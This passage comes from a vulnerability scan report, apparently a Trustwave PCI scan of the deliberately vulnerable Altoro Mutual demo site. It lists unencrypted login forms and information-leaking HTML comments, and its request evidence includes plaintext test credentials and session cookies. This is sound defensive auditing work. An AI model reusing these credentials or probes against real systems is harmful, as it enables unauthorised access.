26 Unencrypted Password 6.1 Medium Fail URL: http://demo.testfire.net/doLogin


Form Port: tcp/80

A form in this web application which appears to be associated with


login credentials (i.e., username and/or password) does not utilize
encryption (HTTPS) for completed forms.

CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http

Evidence:
DetectionDetails: POST - http://demo.testfire.net/doLogin
Detected password form in a non-secure page
Request: POST http://demo.testfire.net/doLogin HTTP/1.1
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C
Origin: http://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=Passwor1&btnSubmit=Login

Remediation:
All login credentials should be transmitted using HTTPS, either

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 279 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
explicitly or from within a current HTTPS context.

27 Unencrypted Password 6.1 Medium Fail URL: http://65.61.137.117:8080/doLogin


Form Port: tcp/8080

A form in this web application which appears to be associated with


login credentials (i.e., username and/or password) does not utilize
encryption (HTTPS) for completed forms.

CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http

Evidence:
DetectionDetails: POST - http://65.61.137.117:8080/doLogin
Detected password form in a non-secure page
Request: POST http://65.61.137.117:8080/doLogin HTTP/1.1
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
Origin: http://65.61.137.117:8080
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=Passwor1&btnSubmit=Login

Remediation:
All login credentials should be transmitted using HTTPS, either
explicitly or from within a current HTTPS context.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 280 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

28 Unencrypted Password 6.1 Medium Fail URL: http://65.61.137.117/doLogin


Form Port: tcp/80

A form in this web application which appears to be associated with


login credentials (i.e., username and/or password) does not utilize
encryption (HTTPS) for completed forms.

CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http

Evidence:
DetectionDetails: POST - http://65.61.137.117/doLogin
Detected password form in a non-secure page
Request: POST http://65.61.137.117/doLogin HTTP/1.1
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13
Origin: http://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=Passwor1&btnSubmit=Login

Remediation:
All login credentials should be transmitted using HTTPS, either
explicitly or from within a current HTTPS context.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 281 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

29 Insecure transmission of 6.1 Medium Fail URL: http://demo.testfire.net:8080/doLogin


credentials Port: tcp/8080

When the authentication information like username or password is


passed to the server via an HTTP GET request, it is supplied using
query string parameters present in the URL. As a result, this
information might be easily available on proxy or web server logs.
Similarly, if such information is sent using HTTP POST request or using
cookies over an unencrypted connection, it is prone to a man-in-the-
middle attack.

CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http

Evidence:
DetectionDetails: Login credentials found in the POST request body
POST - http://demo.testfire.net:8080/doLogin
uid=CHSuser contains CHSuser
passw=Passwor1 contains Passwor1

Request: POST http://demo.testfire.net:8080/doLogin HTTP/1.1


Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282
Origin: http://demo.testfire.net:8080
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=Passwor1&btnSubmit=Login

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 282 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Remediation:
All login credentials should be transmitted using HTTPS using a POST
request.

30 Unencrypted Password 6.1 Medium Fail URL: http://65.61.137.117/login.jsp


Form Port: tcp/80

A form in this web application which appears to be associated with


login credentials (i.e., username and/or password) does not utilize
encryption (HTTPS) for completed forms.

CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http

Evidence:
DetectionDetails: GET - http://65.61.137.117/login.jsp
Detected password form in a non-secure page
Request: GET http://65.61.137.117/login.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13

Remediation:
All login credentials should be transmitted using HTTPS, either
explicitly or from within a current HTTPS context.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 283 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

31 Information leakage via 5.0 Medium Fail URL: http://65.61.137.117:8080/index.jsp


HTML or JavaScript Port: tcp/8080
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117:8080/index.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET http://65.61.137.117:8080/index.jsp HTTP/1.1

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 284 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

32 Information leakage via 5.0 Medium Fail URL: http://65.61.137.117:8080/


HTML or JavaScript Port: tcp/8080
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 285 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Evidence:
DetectionDetails: Limit Exceeded. 9 more item(s) were reported.
GET - http://65.61.137.117:8080/index.jsp?content=personal.htm
GET - http://65.61.137.117:8080/index.jsp?content=business.htm
GET - http://65.61.137.117:8080/subscribe.jsp
POST - http://65.61.137.117:8080/doSubscribe
GET - http://65.61.137.117:8080/default.jsp?content=security.htm
GET - http://65.61.137.117:8080/survey_questions.jsp
GET - http://65.61.137.117:8080/survey_questions.jsp?step=a
GET - http://65.61.137.117:8080/status_check.jsp
GET - http://65.61.137.117:8080/swagger/index.html

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

33 Information leakage via 5.0 Medium Fail URL: http://65.61.137.117:8080/


HTML or JavaScript Port: tcp/8080
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 286 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117:8080/
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET http://65.61.137.117:8080/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

34 Information leakage via 5.0 Medium Fail URL: https://65.61.137.117/sendFeedback


HTML or JavaScript Port: tcp/443

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 287 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
POST - https://65.61.137.117/sendFeedback
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: POST https://65.61.137.117/sendFeedback HTTP/1.1
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4
Origin: https://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117/feedback.jsp

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 288 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 126
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

35 Information leakage via 5.0 Medium Fail URL: http://demo.testfire.net/


HTML or JavaScript Port: tcp/80
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 289 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net/
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET http://demo.testfire.net/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

36 Information leakage via 5.0 Medium Fail URL: http://65.61.137.117/sendFeedback


HTML or JavaScript Port: tcp/80
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 290 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
POST - http://65.61.137.117/sendFeedback
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: POST http://65.61.137.117/sendFeedback HTTP/1.1
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13
Origin: http://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 126

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 291 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

37 Information leakage via 5.0 Medium Fail URL: https://demo.testfire.net/login.jsp


HTML or JavaScript Port: tcp/443
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 292 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net/login.jsp
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->

7 HTML Comment(s) found


<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->
Request: GET https://demo.testfire.net/login.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

38 Information leakage via 5.0 Medium Fail URL: https://demo.testfire.net/index.jsp?content=inside_contact.ht


HTML or JavaScript m
Port: tcp/443

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 293 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net/index.jsp?content=inside_contact.htm
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, contact information,
subscriptions -->
Request: GET
https://demo.testfire.net/index.jsp?content=inside_contact.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 294 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

39 Information leakage via 5.0 Medium Fail URL: https://demo.testfire.net/sendFeedback


HTML or JavaScript Port: tcp/443
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 295 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
DetectionDetails: HTML or Javascript comments found
POST - https://demo.testfire.net/sendFeedback
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: POST https://demo.testfire.net/sendFeedback HTTP/1.1
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3
Origin: https://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 126
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

40 Information leakage via 5.0 Medium Fail URL: http://65.61.137.117:8080/sendFeedback


HTML or JavaScript Port: tcp/8080
comments
While adding general comments is very useful, some programmers

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 296 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
POST - http://65.61.137.117:8080/sendFeedback
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: POST http://65.61.137.117:8080/sendFeedback HTTP/1.1
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
Origin: http://65.61.137.117:8080
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 297 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Content-Length: 126
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

41 Information leakage via 5.0 Medium Fail URL: http://demo.testfire.net/index.jsp?content=inside_contact.htm


HTML or JavaScript Port: tcp/80
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 298 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net/index.jsp?content=inside_contact.htm
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, contact information,
subscriptions -->
Request: GET
http://demo.testfire.net/index.jsp?content=inside_contact.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

42 Information leakage via 5.0 Medium Fail URL: http://demo.testfire.net/search.jsp?query=_WSETESTDATA


HTML or JavaScript Port: tcp/80
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 299 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net/search.jsp?query=_WSETESTDATA
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: GET
http://demo.testfire.net/search.jsp?query=_WSETESTDATA HTTP/1.1
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

